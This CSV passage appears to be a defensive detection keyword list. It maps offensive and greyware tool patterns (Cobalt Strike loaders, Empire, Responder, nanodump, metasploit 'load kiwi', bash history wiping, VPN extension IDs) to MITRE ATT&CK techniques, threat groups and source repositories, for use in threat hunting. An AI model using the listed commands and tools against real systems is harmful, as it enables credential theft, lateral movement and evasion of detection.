-*linWinPwn.*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*lion2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lion2john-alt.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*LiquidSnake.exe*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*list_backdoors*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*List_Privileges /Process:powershell*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*list_tcppivot*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*list_tokens -u*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*ListAccountsWithSPN*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListAllUsers.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*ListDescriptionContainsPass*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListDomainAdmins*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListDomainGroupsLocalAdmin*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*listen(58082* '0.0.0.0'*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*listen_http 0.0.0.0 8080 *.php operation1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*ListMetasploitPayloads*,offensive_tool_keyword,empire,Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ListNeverLoggedInAccounts*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListPasswordNeverExpire*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersLastPasswordChange*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersNoPasswordRequired*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersPasswordMustChange*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*ListUsersPasswordNotChanged*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*litefuzz -lk -c*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz -s -a *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz* -l -c*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz.py *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*litefuzz\fuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*lkarlslund/Adalanche*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*lklekjodgannjcccdlbicoamibgbdnmi*,greyware_tool_keyword,Anonymous Proxy Vpn Browser,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*llbhddikeonkpbhpncnhialfbpnilcnc*,greyware_tool_keyword,ProxyFlow,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*llehsrewop*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed powershell,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*-llmnr -spn '*cifs* -secrets*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*LLMNR.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*LLMNRSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*llsrpc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*lmhash*aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*ln -sf /dev/null *bash_history*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*lneaocagcijjdpkcabeanfpdbmapcjjg*,greyware_tool_keyword,Hub VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lnfdmdhmfbimhhpaeocncdlhiodoblbd*,greyware_tool_keyword,VPN PROXY MASTER,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lnk-generate.py --host * --type ntlm --output *.lnk*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*lnx_keylogger.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*load aggressor script*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*load incognito*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*load kiwi*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Mimikatz,10,10,N/A,N/A,N/A,N/A -*load_sc.exe *.bin*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,0,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*load_ssp *.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Load-BeaconParameters*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Load-Bof(*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*loaddll64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*loader/inject.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader/inject_local.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader/loader/loader.c*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*loader_exe_x64.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader_exe_x86.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*LoadEWSDLL*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the 